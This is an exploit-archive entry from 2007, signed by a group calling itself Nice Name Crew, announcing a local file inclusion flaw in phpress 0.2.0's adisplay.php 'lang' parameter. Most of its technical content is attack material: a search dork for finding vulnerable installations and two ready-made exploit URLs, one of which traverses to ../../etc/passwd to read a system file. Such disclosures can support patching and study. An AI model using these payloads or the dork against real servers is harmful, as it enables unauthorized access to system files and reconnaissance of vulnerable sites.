phpress 0.2.0 (adisplay.php lang) Local File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : phpress 0.2.0 (adisplay.php lang) Local File Inclusion Vulnerability
# Published : 2007-09-08
# Author : Nice Name Crew
# Previous Title : Joomla Component Restaurante Remote File Upload Vulnerability
# Next Title : WebED 0.8999a Multiple Remote File Inclusion Vulnerabilities

:::::::::::::::::::::::::::::::::::::::::::::::::::.......................
::|  | (_)          |  | |                       / ____|                  
::|  | |_  ___ ___  |  | | __ _ _ __ ___   ___  | |     _ __ _____      __
::| . ` | |/ __/ _  | . ` |/ _` | '_ ` _  / _  | |    | '__/ _   / / /
::| |  | | (_|  __/ | |  | (_| | | | | | |  __/ | |____| | |  __/ V  V / 
::|_| _|_|______| |_| _|__,_|_| |_| |_|___|  _____|_|  ___| _/_/
:::::::::::::::::::::::::::::We got the nicest name in the security scene!
::::::::Info::.
::Script: phpress 
::Version: 0.2.0 
::Homepage:http://sourceforge.net/projects/phpress/
::
:::::::::Details::.
::Type: Local_File_Inclusion
::Dork: allinurl:/phpress/
::Exploit: http://host/phpress/adisplay.php?lang=shell
::Exploit: http://host/phpress/adisplay.php?lang=../../etc/passwd
::
::Variable lang is not defined
::
::::::::::::::::::::::::::::::::.
:::::::::::Additional_Information::.
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::.
::Contact: naxx@chilloutzone.eu
::Website: none yet
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::.

# www.Syue.com [2007-09-08]